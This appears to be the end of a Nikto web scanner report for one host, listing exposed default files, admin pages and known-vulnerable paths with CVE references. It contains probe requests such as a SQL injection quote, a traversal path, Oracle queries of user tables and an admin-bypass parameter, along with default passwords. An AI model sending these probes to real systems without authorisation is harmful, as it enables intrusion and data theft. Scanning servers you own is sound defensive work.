/manual/ag/esperfrm.htm: Default Netscape manual found. All default pages should be removed. See: CWE-552 + /nethome/: Netscape Enterprise Server default doc/manual directory. Reveals server path at bottom of page. See: CWE-552 + /com/novell/gwmonitor/help/en/default.htm: Netware gateway monitor access documentation found. All default documentation should be removed from web servers. See: CWE-552 + /com/novell/webaccess/help/en/default.htm: Netware web access documentation found. All default documentation should be removed from web servers. See: CWE-552 + /com/novell/webpublisher/help/en/default.htm: Netware web publisher documentation found. All default documentation should be removed from web servers. See: CWE-552 + /servlet/AdminServlet: Netware Web Search Server (adminservlet) found. All default code should be removed from web servers. See: CWE-552 + /servlet/gwmonitor: Netware Gateway monitor found. All default code should be removed from web servers. See: CWE-552 + /servlet/PrintServlet: Novell Netware default servlet found. All default code should be removed from the system. See: CWE-552 + /servlet/SearchServlet: Novell Netware default servlet found. All default code should be removed from the system. See: CWE-552 + /servlet/ServletManager: Netware Java Servlet Gateway found. Default user ID is servlet, default password is manager. All default code should be removed from Internet servers. See: CWE-552 + /servlet/sq1cdsn: Novell Netware default servlet found. All default code should be removed from the system. See: CWE-552 + /servlet/sqlcdsn: Netware SQL connector found. All default code should be removed from web servers. See: CWE-552 + /servlet/webacc: Netware Enterprise and/or GroupWise web access found. All default code should be removed from Internet servers. See: CWE-552 + /servlet/webpub: Netware Web Publisher found. All default code should be removed from web servers. See: CWE-552 + /WebSphereSamples: Netware Webshere sample applications found. All default code should be removed from web servers. See: CWE-552 + /index.html.ca: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.cz.iso8859-2: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.de: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.dk: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.ee: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.el: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.en: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.es: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.et: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.fr: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.he.iso8859-8: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.hr.iso8859-2: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.it: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.ja.iso2022-jp: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.kr.iso2022-kr: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.ltz.utf8: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.lu.utf8: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.nl: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.nn: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.no: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.po.iso8859-2: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.pt: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.pt-br: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.ru.cp-1251: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.ru.cp866: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.ru.iso-ru: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.ru.koi8-r: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.ru.utf8: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.se: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.tw: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.tw.Big5: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.var: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /iissamples/sdk/asp/docs/codebrw2.asp: This is a default IIS script/file that should be removed. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0739,https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013 + /iissamples/sdk/asp/docs/codebrws.asp: This is a default IIS script/file that should be removed. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0739,https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013 + /iissamples/sdk/asp/docs/Winmsdp.exe: This is a default IIS script/file that should be removed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0738. https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1451,https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013 + /a/: May be Kebi Web Mail administration menu. See: CWE-552 + /basilix/: BasiliX webmail application. Default mysql database name is 'BASILIX' with password 'bsxpass'. See: CWE-552 + /interchange/: Interchange chat is installed. Look for a high-numbered port like 20xx to find it running. See: CWE-552 + /uploader.php: This script may allow arbitrary files to be uploaded to the remote server. See: OSVDB-3282 + /conspass.chl+: Abyss allows hidden/protected files to be served if a + is added to the request. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1081 + /consport.chl+: Abyss allows hidden/protected files to be served if a + is added to the request. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1081 + /general.chl+: Abyss allows hidden/protected files to be served if a + is added to the request. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1081 + /srvstatus.chl+: Abyss allows hidden/protected files to be served if a + is added to the request. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1081 + /mlog.html: Remote file read vulnerability 1999-0068. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0068 + /mlog.phtml: Remote file read vulnerability 1999-0068. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0068 + /php/mlog.html: Remote file read vulnerability 1999-0346. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0068 + /php/mlog.phtml: Remote file read vulnerability 1999-0346. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0068 + /soapConfig.xml: Oracle 9iAS configuration file found. See: http://www.securityfocus.com/bid/4290 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0568 https://securiteam.com/securitynews/5IP0B203PI/ + /XSQLConfig.xml: Oracle 9iAS configuration file found. See: http://www.securityfocus.com/bid/4290 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0568 https://securiteam.com/securitynews/5IP0B203PI/ + /surf/scwebusers: SurfControl SuperScout Web Reports Server user and password file is available. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0705 + /_private/form_results.htm: This file may contain information submitted by other web users via forms. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1052 + /_private/form_results.html: This file may contain information submitted by other web users via forms. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1052 + /_private/form_results.txt: This file may contain information submitted by other web users via forms. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1052 + /scripts/tools/getdrvrs.exe: MS Jet database engine can be used to make DSNs, useful with an ODBC exploit and the RDS exploit (with msadcs.dll) which mail allow command execution. See: http://attrition.org/security/advisory/individual/rfp/rfp.9901.nt_odbc + /project/index.php?m=projects&user_cookie=1: dotProject 0.2.1.5 may allow admin login bypass by adding the user_cookie=1 to the URL. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1428 + /site/eg/source.asp: This ASP (installed with Apache::ASP) allows attackers to upload files to the server. Upgrade to 1.95 or higher. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0628 + /iissamples/exair/search/advsearch.asp: Scripts within the Exair package on IIS 4 can be used for a DoS against the server. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0449 + /isqlplus: Oracle iSQL*Plus is installed. This may be vulnerable to a buffer overflow in the user ID field. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1264 + /data/member_log.txt: Teekai's forum full 1.2 member's log can be retrieved remotely. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2057 + /data/userlog/log.txt: Teekai's Tracking Online 1.0 log can be retrieved remotely. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2058 + /userlog.php: Teekai's Tracking Online 1.0 log can be retrieved remotely. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2058 + /ban.dat: Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected. See: OSVDB-4237 + /ban.log: Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected. See: OSVDB-4237 + /admin/adminproc.asp: Xpede administration page may be available. The /admin directory should be protected. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0579 + /admin/datasource.asp: Xpede page reveals SQL account name. The /admin directory should be protected. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0579 + /utils/sprc.asp: Xpede page may allow SQL injection. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0579 + /texis.exe/?-dump: Texis installation may reveal sensitive information. See: OSVDB-4314 + /texis.exe/?-version: Texis installation may reveal sensitive information. See: OSVDB-4314 + /acart2_0/admin/category.asp?catcode=': Alan Ward A-Cart 2.0 is vulnerable to a SQL inject attack. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1873 + /Sites/Knowledge/Membership/Inspired/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0737,https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013 + /Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0737,https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013 + /Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0737,https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013 + /Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0737,https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013 + /Sites/Samples/Knowledge/Push/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0737,https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013 + /Sites/Samples/Knowledge/Search/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0737,https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013 + /SiteServer/Publishing/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0737,https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013 + /siteserver/publishing/viewcode.asp?source=/default.asp: May be able to view source code using Site Server vulnerability. See: OSVDB-17671 + /securelogin/1,2345,A,00.html: Vignette Story Server v4.1, 6, may disclose sensitive information via a buffer overflow. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0385 + /config.inc: DotBr 0.1 configuration file includes usernames and passwords. See: OSVDB-5092 + /sysuser/docmgr/ieedit.stm?url=../: Sambar default file may allow directory listings. See: https://seclists.org/fulldisclosure/2003/Mar/265 + /sysuser/docmgr/iecreate.stm?template=../: Sambar default file may allow directory listings. See: https://seclists.org/fulldisclosure/2003/Mar/265 + /catinfo: May be vulnerable to a buffer overflow. Request '/catinfo?' and add on 2048 of garbage to test. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0432 + /MWS/HandleSearch.html?searchTarget=test&B1=Submit: MyWebServer 1.0.2 may be vulnerable to a buffer overflow (untested). Upgrade to a later version if 990b of searched data crashes the server. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1452 + /server-info: This gives a lot of Apache information. Comment out appropriate line in httpd.conf or restrict access to allowed hosts. See: https://www.invicti.com/web-vulnerability-scanner/vulnerabilities/apache-server-info-detected/ + /.nsconfig: Contains authorization information. See: OSVDB-5709 + /dc/auth_data/auth_user_file.txt: The DCShop installation allows credit card numbers to be viewed remotely. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0821 https://packetstormsecurity.com/files/32406/xmas.txt.html + /dc/orders/orders.txt: The DCShop installation allows credit card numbers to be viewed remotely. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0821 https://packetstormsecurity.com/files/32406/xmas.txt.html + /cgi-bin/hpnst.exe?c=p+i=SrvSystemInfo.html: HP Instant TopTools GoAhead WebServer hpnst.exe may be vulnerable to a DoS. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0169 + /applist.asp: Citrix server may allow remote users to view applications installed without authenticating. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0502 + /launch.asp?NFuse_Application=LookOut&NFuse_MIMEExtension=.ica: Citrix server may reveal sensitive information by accessing the 'advanced' tab on the login screen. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0301 + /_layouts/alllibs.htm: Microsoft SharePoint Portal and Team Services vulnerable to NT or NTLM authentication bypass on Win2000 SP4 using IE 6.x. See: https://seclists.org/bugtraq/2003/Nov/226 + /_layouts/settings.htm: Microsoft SharePoint Portal and Team Services vulnerable to NT or NTLM authentication bypass on Win2000 SP4 using IE 6.x. See: https://seclists.org/bugtraq/2003/Nov/226 + /_layouts/userinfo.htm: Microsoft SharePoint Portal and Team Services vulnerable to NT or NTLM authentication bypass on Win2000 SP4 using IE 6.x. See: https://seclists.org/bugtraq/2003/Nov/226 + /stronghold-info: Redhat Stronghold from versions 2.3 up to 3.0 discloses sensitive information. This gives information on configuration. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0868 + /stronghold-status: Redhat Stronghold from versions 2.3 up to 3.0 discloses sensitive information. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0868 + /iissamples/exair/howitworks/Code.asp: Scripts within the Exair package on IIS 4 can be used for a DoS against the server. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0449 + /iissamples/exair/howitworks/Codebrw1.asp: This is a default IIS script/file which should be removed, it may allow a DoS against the server. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0449 https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013 + /globals.jsa: Oracle globals.jsa file. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0562 + /iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp: IIS may be vulnerable to source code viewing via the example CodeBrws.asp file. Remove all default files from the web root. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0739 https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013 + /pass_done.php: PY-Membres 4.2 may allow users to execute a query which generates a list of usernames and passwords. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1198 + /admin/admin.php?adminpy=1: PY-Membres 4.2 may allow administrator access. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1198 + /j2ee/: j2ee directory found--possibly an Oracle app server directory. See: CWE-552 + /WebCacheDemo.html: Oracle WebCache Demo. See: CWE-552 + /webcache/: Oracle WebCache Demo. See: CWE-552 + /webcache/webcache.xml: Oracle WebCache Demo. See: CWE-552 + /bmp/: SQLJ Demo Application. See: CWE-552 + /bmp/global-web-application.xml: SQLJ Demo Application. See: CWE-552 + /bmp/JSPClient.java: SQLJ Demo Application. See: CWE-552 + /bmp/mime.types: SQLJ Demo Application. See: CWE-552 + /bmp/README.txt: SQLJ Demo Application. See: CWE-552 + /bmp/sqljdemo.jsp: SQLJ Demo Application. See: CWE-552 + /bmp/setconn.jsp: SQLJ Demo Application. See: CWE-552 + /ptg_upgrade_pkg.log: Oracle log files. See: CWE-552 + /OA_HTML/oam/weboam.log: Oracle log files. See: CWE-552 + /webapp/admin/_pages/_bc4jadmin/: Oracle JSP files. See: CWE-552 + /_pages/_webapp/_admin/_showpooldetails.java: Oracle JSP files. See: CWE-552 + /_pages/_webapp/_admin/_showjavartdetails.java: Oracle JSP file. See: CWE-552 + /_pages/_demo/: Oracle JSP file. See: CWE-552 + /_pages/_webapp/_jsp/: Oracle JSP file. See: CWE-552 + /_pages/_demo/_sql/: Oracle JSP file. See: CWE-552 + /OA_HTML/_pages/: Oracle JSP file. See: CWE-552 + /OA_HTML/webtools/doc/index.html: Cabo DHTML Components Help Page. See: CWE-552 + /reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF: Oracle Reports rwservlet report Variable Arbitrary Report Executable Execution. See: https://www.exploit-db.com/exploits/26006 + /apex/: Oracle Application Express login screen. See: CWE-552 + /OA_JAVA/: Oracle Applications Portal Page. See: CWE-552 + /OA_HTML/: Oracle Applications Portal Page. See: CWE-552 + /aplogon.html: Oracle Applications Portal Page. See: CWE-552 + /appdet.html: Oracle Applications Portal Pages. See: CWE-552 + /servlets/weboam/oam/oamLogin: Oracle Application Manager. See: CWE-552 + /OA_HTML/PTB/mwa_readme.htm: Oracle Mobile Applications Industrial Server administration and configuration interface. See: CWE-552 + /reports/rwservlet: Oracle Reports. See: CWE-552 + /reports/rwservlet/showenv: Oracle Reports. See: CWE-552 + /reports/rwservlet/showmap: Oracle Reports. See: CWE-552 + /reports/rwservlet/showjobs: Oracle Reports. See: CWE-552 + /reports/rwservlet/getjobid7?server=myrep: Oracle Reports. See: CWE-552 + /reports/rwservlet/getjobid4?server=myrep: Oracle Reports. See: CWE-552 + /reports/rwservlet/showmap?server=myserver: Oracle Reports. See: CWE-552 + /pls/portal/owa_util.cellsprint?p_theQuery=select: Direct access to Oracle packages could have an unknown impact. + /pls/portal/owa_util.listprint?p_theQuery=select: Access to Oracle pages could have an unknown impact. + /pls/portal/owa_util.show_query_columns?ctable=sys.dba_users: Access to Oracle pages could have an unknown impact. + /pls/portal/owa_util.showsource?cname=owa_util: Access to Oracle pages could have an unknown impact. + /pls/portal/owa_util.cellsprint?p_theQuery=select+*+from+sys.dba_users: Access to Oracle pages could have an unknown impact. + /pls/portal/owa_util.signature: Access to Oracle pages could have an unknown impact. + /pls/portal/HTP.PRINT: Access to Oracle pages could have an unknown impact. + /pls/portal/CXTSYS.DRILOAD.VALIDATE_STMT: Access to Oracle pages could have an unknown impact. + /pls/portal/PORTAL_DEMO.ORG_CHART.SHOW: Access to Oracle pages could have an unknown impact. + /pls/portal/PORTAL.wwv_form.genpopuplist: Access to Oracle pages cold have an unknown impact. + /pls/portal/PORTAL.wwv_ui_lovf.show: Access to Oracle pages could have an unknown impact. + /pls/portal/PORTAL.wwv_dynxml_generator.show: Access to Oracle pages could have an unknown impact. + /pls/portal/PORTAL.home: Access to Oracle pages could have an unknown impact. + /pls/portal/PORTAL.wwv_main.render_warning_screen?p_oldurl=inTellectPRO&p_newurl=inTellectPRO: Access to Oracle pages could have an unknown impact. + /pls/portal/SELECT: Access to Oracle pages could have an unknown impact. + /pls/portal/null: Access to Oracle pages could have an unknown impact. + /OA_MEDIA/: Oracle Applications portal pages found. + /OA_HTML/META-INF/: Oracle Applications portal pages found. + /OA_HTML/jsp/por/services/login.jsp: Oracle Applications portal pages found. + /OA_HTML/PTB/ICXINDEXBASECASE.htm: Oracle Applications portal pages found. + /OA_HTML/PTB/ECXOTAPing.htm: Oracle Applications portal pages found. + /OA_HTML/PTB/xml_sample1.htm: Oracle Applications portal pages found. + /OA_HTML/jsp/wf/WFReassign.jsp: Oracle Applications portal pages found. + /OA_JAVA/Oracle/: Oracle Applications portal pages found. + /OA_JAVA/servlet.zip: Oracle Applications portal pages found. + /OA_JAVA/oracle/forms/registry/Registry.dat: Oracle Applications portal pages found. + /OA_HTML/jsp/: Oracle Applications portal page found. See: CWE-552 + /OA_HTML/jsp/fnd/fndversion.jsp: Oracle Applications help page found. See: CWE-552 + /OA_HTML/jsp/fnd/fndhelp.jsp?dbc=/u01/oracle/prodappl/fnd/11.5.0/secure/dbprod2_prod.dbc: Oracle Applications help page found. See: CWE-552 + /OA_HTML/jsp/fnd/fndhelputil.jsp: Oracle Applications help page found. See: CWE-552 + /install/install.php: Install file found. + /cehttp/trace: Sterling Commerce Connect Direct trace log file may contain user ID information. + /cehttp/property/: Sterling Commerce Connect Direct configuration files. + /doc/icodUserGuide.pdf: Instant Capacity on Demand (iCOD) UserĂ­s Guide. See: CWE-552 + /doc/planning_SuperDome_configs.pdf: Planning HP SuperDome Configurations. See: CWE-552 + /doc/vxvm/pitc_ag.pdf: VERITAS FlashSnapTM Point-In-Time Copy Solutions documentation. See: CWE-552 + /doc/Judy/Judy_tech_book.pdf: HP Judy documentation found. See: CWE-552 + /doc/vxvm/vxvm_ag.pdf: Veritas Volume Manager documentation. See: CWE-552 + /doc/vxvm/vxvm_hwnotes.pdf: Veritas Volume Manager documentation. See: CWE-552 + /doc/vxvm/vxvm_ig.pdf: Veritas Volume Manager documentation. See: CWE-552 + /doc/vxvm/vxvm_mig.pdf: Veritas Volume Manager documentation. See: CWE-552 + /doc/vxvm/vxvm_tshoot.pdf: Veritas Volume Manager documentation. See: CWE-552 + /doc/vxvm/vxvm_notes.pdf: Veritas Volume Manager documentation. See: CWE-552 + /doc/vxvm/vxvm_ug.pdf: Veritas Volume Manager documentation. See: CWE-552 + /staging/: This might be interesting. + /_archive/: Archive found. + /wsman/: Windows Remote Management is enabled. + 8073 requests: 0 error(s) and 612 item(s) reported on remote host + End Time: 2024-11-29 17:39:34 (GMT-5) (34 seconds) --------------------------------------------------------------------------- + 1 host(s) tested